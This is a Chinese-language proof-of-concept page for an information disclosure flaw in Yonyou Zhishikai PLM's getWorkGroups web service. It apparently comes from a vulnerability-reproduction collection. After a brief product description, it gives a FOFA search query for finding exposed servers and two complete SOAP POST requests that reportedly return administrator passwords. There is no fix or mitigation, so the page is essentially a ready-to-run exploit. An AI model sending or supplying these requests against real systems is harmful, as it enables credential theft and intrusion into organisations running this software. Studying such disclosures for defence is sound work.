登录 白背景
源码

用友智石开PLM getWorkGroups存在信息泄露漏洞

一、漏洞简介

智石开高科技及电子行业解决方案帮助高科技及电子行业企业构建一套规范化的研发信息管理系统,改变目前主要依靠人来管理企业产品研发项目开发流程和产品资料管理的落后状态;帮助企业实现产品研发项目过程规范化管理,完善企业产品研发质量体系,提升企业项目管理水平和产品创新能力;同时帮助企业实现产品研发项目流程和研发数据的统一管理和数据共享。用友智石开PLM getWorkGroups存在信息泄露漏洞,攻击者可通过该漏洞获取管理员密码等敏感信息。

二、影响版本

  • 用友智石开PLM

三、资产测绘

  • fofabody="智石开PLM"
  • 特征

1716102153966-57c4bf66-3716-4847-9215-fbe365edc062.png

四、漏洞复现

POST /services/MessageService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 
Content-Length: 208

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mes="MessageService">
   <soapenv:Header/>
   <soapenv:Body>
      <mes:getWorkGroups/>
   </soapenv:Body>
</soapenv:Envelope>

1716102212318-4eb6109a-495f-44b4-b88e-58d5077f9cf4.png

POST /services/WorkGroupService HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: Secure; JSESSIONID=9424E6CE26117CA8A1D223E13DD6E34A; Secure
Upgrade-Insecure-Requests: 1
Priority: u=1
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 
Content-Length: 210

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wor="WorkGroupService">
   <soapenv:Header/>
   <soapenv:Body>
      <wor:getWorkGroups/>
   </soapenv:Body>
</soapenv:Envelope>

1716103211585-c4a014d4-51d5-4288-acd0-ca75a3d80b26.png

原文: https://www.yuque.com/xiaokp7/ocvun2/rkn5gf3amcok7ai0